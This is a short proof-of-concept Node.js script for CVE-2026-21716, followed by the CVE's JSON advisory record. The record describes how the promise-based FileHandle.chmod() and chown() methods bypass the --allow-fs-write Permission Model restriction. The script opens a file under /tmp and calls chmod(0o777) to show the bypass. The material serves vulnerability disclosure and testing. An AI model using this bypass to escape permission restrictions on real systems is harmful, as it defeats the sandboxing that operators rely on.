CVE-2026-21716

// Run the script with restricted permissions: // node --experimental-permission --allow-fs-write=/tmp script.js import { open } from 'node:fs/promises'; async function triggerVulnerability() { try { // 1. Open a file within the allowed write directory to get a FileHandle const fileHandle = await open('/tmp/safe.txt', 'w'); console.log('[+] File opened successfully.'); // 2. Attempt to change file permissions using the vulnerable Promise API // In a patched version, this should be blocked by the Permission Model. // Due to CVE-2026-21716, this bypasses the --allow-fs-write restriction. await fileHandle.chmod(0o777); console.log('[+] Exploit successful: File permissions changed via chmod().'); // 3. Attempt to change file ownership (if permissions allow, conceptually vulnerable) // await fileHandle.chown(1000, 1000); await fileHandle.close(); } catch (error) { console.error('[-] Permission denied or error:', error.message); } } triggerVulnerability();

{"cve": {"id": "CVE-2026-21716", "sourceIdentifier": "[email protected]", "published": "2026-03-30T20:16:19.873", "lastModified": "2026-04-01T14:24:21.833", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An incomplete fix for CVE-2024-36137 leaves `FileHandle.chmod()` and `FileHandle.chown()` in the promises API without the required permission checks, while their callback-based equivalents (`fs.fchmod()`, `fs.fchown()`) were correctly patched.\r\n\r\nAs a result, code running under `--permission` with restricted `--allow-fs-write` can still use promise-based `FileHandle` methods to modify file permissions and ownership on already-open file descriptors, bypassing the intended write restrictions.\r\n\r\nThis vulnerability affects **20.x, 22.x, 24.x, and 25.x** processes using the Permission Model where `--allow-fs-write` is intentionally restricted."}, {"lang": "es", "value": "Una solución incompleta para CVE-2024-36137 deja `FileHandle.chmod()` y `FileHandle.chown()` en la API de promesas sin las comprobaciones de permisos requeridas, mientras que sus equivalentes basados en callbacks (`fs.fchmod()`, `fs.fchown()`) fueron parcheados correctamente.\n\nComo resultado, el código que se ejecuta bajo `--permission` con `--allow-fs-write` restringido aún puede usar métodos `FileHandle` basados en promesas para modificar los permisos y la propiedad de los archivos en descriptores de archivo ya abiertos, eludiendo las restricciones de escritura previstas.\n\nEsta vulnerabilidad afecta a los procesos 20.x, 22.x, 24.x y 25.x que utilizan el Modelo de Permisos donde `--allow-fs-write` está restringido intencionalmente."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://nodejs.org/en/blog/vulnerability/march-2026-security-releases", "source": "[email protected]"}]}}